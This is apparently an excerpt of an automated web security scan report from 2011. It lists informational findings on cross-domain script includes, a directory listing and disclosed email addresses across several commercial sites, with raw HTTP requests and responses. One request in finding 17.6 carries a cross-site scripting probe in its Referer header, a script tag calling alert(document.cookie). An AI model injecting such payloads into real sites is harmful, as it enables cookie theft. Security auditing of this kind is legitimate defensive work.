Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 96324

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.436. http://www.volunteercrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.volunteercrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.volunteercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:21 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=g51vkhrfm2pue55e02ud4e5mi3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109074

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.437. http://www.woothemes.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.woothemes.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/woothemes.json?callback=twitterCallback2&count=1
http://www.google.com/cse/brand?form=cse-search-box-footer&lang=en

Request

GET / HTTP/1.1
Host: www.woothemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:51 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.3.2
Last-Modified: Fri, 21 Jan 2011 19:37:28 GMT
Vary: Cookie
Expires: Fri, 21 Jan 2011 20:37:28 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: a9602306e2be29cba5c13f300262aee7
X-Pingback: http://www.woothemes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Content-Length: 25889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/1
...[SNIP]...
</div> <script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script> <script type="text/javascript" src="http://twitter.com/statuses/user_timeline/woothemes.json?callback=twitterCallback2&count=1"></script>
...[SNIP]...
</form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box-footer&lang=en"></script>
...[SNIP]...

15.438. http://www.workathomecrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.workathomecrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.workathomecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3slq9onb09lnusoc4dh32k8bf6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117680

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.439. http://www.writingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.writingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.writingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:54 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2o6rg0j8fbtu2n6kkit7kt2526; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113096

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

16. Directory listing previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.answers.com
Path:	/topic/vinson-elkins-llp

Issue description

Directory listings do not necessarily constitute a security vulnerability. Any sensitive resources within your web root should be properly access-controlled in any case, and should not be accessible by an unauthorised party who happens to know the URL. Nevertheless, directory listings can aid an attacker by enabling them to quickly identify the resources at a given path, and proceed directly to analysing and attacking them.

Issue remediation

There is not usually any good reason to provide directory listings, and disabling them may place additional hurdles in the path of an attacker. This can normally be achieved in two ways:

Configure your web server to prevent directory listings for all paths beneath the web root;
Place into each directory a default file (such as index.htm) which the web server will display instead of returning a directory listing.

Request

GET /topic/vinson-elkins-llp HTTP/1.1
Host: www.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:39:52 GMT
Server: AWS
Set-Cookie: lc=nt013; path=/; domain=www.answers.com; expires=Fri, 04-Feb-2011 18:39:52 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=05EA67FCD231E20FB8B1E7B8BD5DBA11; Path=/
Set-Cookie: settings=ver||fayt|1|ate|1|tabOrder|default|home|1; Domain=.answers.com; Expires=Sat, 21-Jan-2012 18:39:52 GMT; Path=/
Set-Cookie: settingsS=ver||fayt|1|ate|1|tabOrder|default|home|1; Domain=.answers.com; Path=/
Set-Cookie: afid=0; Expires=Sun, 13-Jan-2041 18:39:52 GMT; Path=/
Set-Cookie: GNFirstVisit=1295635192020; Expires=Sun, 13-Jan-2041 18:39:52 GMT; Path=/
Set-Cookie: tacodaSession=; Path=/
Set-Cookie: nafid=0; Path=/
Set-Cookie: referrerDomainSession=none; Path=/
Set-Cookie: firstPageTypeSession=topic-page; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 69874

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html class="IE IEnew IE7" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.
...[SNIP]...
<span class="tabTitle" title="International Directory of Company Histories © 2006" >Gale Directory of Company Histories:</span>
...[SNIP]...
<b>Gale Directory of Company Histories</b>
...[SNIP]...
<u>International Directory of Company Histories</u>
...[SNIP]...

17. Email addresses disclosed previous next
There are 32 instances of this issue:

http://www.aharrisonbarnes.com/
http://www.aharrisonbarnes.com/contact-us/script/functions.js
http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/
http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/
http://www.aharrisonbarnes.com/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen
http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/javascript/tabber.js
http://www.bcgsearch.com/searchresults.php
http://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js
http://www.bmwusa.com/JavaScript/s_code.js
https://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js
https://www.bmwusa.com/JavaScript/s_code.js
http://www.businessweek.com/news/2011-01-20/merrill-lynch-jm-said-to-be-hired-for-power-finance-share-sale.html
http://www.directstartv.com/
http://www.huffingtonpost.com/2011/01/05/david-koch-tea-party-republicans_n_804997.html
http://www.huffingtonpost.com/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html
http://www.intelliprice.com/intellipricedealer/start.htm
http://www.lawcrossing.com/
http://www.legalauthority.com/signup.php
http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/
http://www.opensource.org/licenses/gpl-license.php
http://www.opensource.org/licenses/mit-license.php
http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html
http://www.toyota.com/js/global/global.js
http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/calendar.js
http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/prototype.js
http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm
http://www.velaw.com/WorkArea/java/ektron.js
http://www.velaw.com/lawyers/DavidBlumental.aspx
http://www.velaw.com/lawyers/DavidDAlessandro.aspx
http://www.velaw.com/lawyers/JaneVris.aspx
http://www.velaw.com/offices/Dallas.aspx
http://www.velaw.com/offices/Houston.aspx

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

17.1. http://www.aharrisonbarnes.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aharrisonbarnes.com
Path:	/

Issue detail

The following email address was disclosed in the response:

contact@aharrisonbarnes.com

Request

GET / HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.2. http://www.aharrisonbarnes.com/contact-us/script/functions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aharrisonbarnes.com
Path:	/contact-us/script/functions.js

Issue detail

The following email address was disclosed in the response:

contact@aharrisonbarnes.com

Request

Response

17.3. http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aharrisonbarnes.com
Path:	/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/

Issue detail

The following email address was disclosed in the response:

contact@aharrisonbarnes.com

Request

Response

17.4. http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aharrisonbarnes.com
Path:	/push-yourself-outside-your-comfort-zone/

Issue detail

The following email address was disclosed in the response:

contact@aharrisonbarnes.com

Request

GET /push-yourself-outside-your-comfort-zone/ HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.5. http://www.aharrisonbarnes.com/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aharrisonbarnes.com
Path:	/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen

Issue detail

The following email address was disclosed in the response:

contact@aharrisonbarnes.com

Request

Response

17.6. http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/javascript/tabber.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aharrisonbarnes.com
Path:	/wp-content/themes/HB_new_theme/javascript/tabber.js

Issue detail

The following email address was disclosed in the response:

pat@barelyfitz.com

Request

GET /wp-content/themes/HB_new_theme/javascript/tabber.js HTTP/1.1
Host: www.aharrisonbarnes.com
Proxy-Connection: keep-alive
Referer: http://www.aharrisonbarnes.com/?69719'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1fd47fb9727=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6l172e37v71rcv0l37cvee3g96; wpgb_visit_last_php-default=1295654937; wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22caf0b0ec76de78d91869eecad060b7ac%22%3Bi%3A1%3Bi%3A1295654938%3B%7D; wishlist_reg_cookie_manual=1

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 00:09:10 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Fri, 02 Apr 2010 09:32:23 GMT
ETag: "11d0009-3c9c-4833da81477c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/x-javascript
Content-Length: 15516

/*==================================================
$Id: tabber.js,v 1.9 2006/04/27 20:51:51 pat Exp $
tabber.js by Patrick Fitzgerald pat@barelyfitz.com

Documentation can be found at the following URL:
http://www.barelyfitz.com/projects/tabber/

License (http://www.opensource.org/licenses/mit-license.php)

Copyright (c) 2006 Patrick Fitzgeral
...[SNIP]...

17.7. http://www.bcgsearch.com/searchresults.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bcgsearch.com
Path:	/searchresults.php

Issue detail

The following email address was disclosed in the response:

jobs@bcgsearch.com

Request

GET /searchresults.php HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=e0kuekof5a3ckuktgjpsc8gnp2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68543

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Attorney Jobs, Recruiting Firm, Placement Agency, Placement Service, Search
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...

17.8. http://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Referer: http://www.bmwusa.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; NSC_CNX_21529_64.29.204.16=4f52b42b3660

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
ETag: "982f96e670abcb1:229f"
Last-Modified: Mon, 03 Jan 2011 18:06:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:21:51 GMT
Connection: close
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

17.9. http://www.bmwusa.com/JavaScript/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/JavaScript/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ls.tc

Request

GET /JavaScript/s_code.js HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Referer: http://www.bmwusa.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
ETag: "3c36fbe570abcb1:229f"
Last-Modified: Mon, 03 Jan 2011 18:06:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:21:52 GMT
Connection: close
Content-Length: 44197

.../* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
D
...[SNIP]...
av()+q+(qs?qs:s."
+ "rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+ "lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^
...[SNIP]...

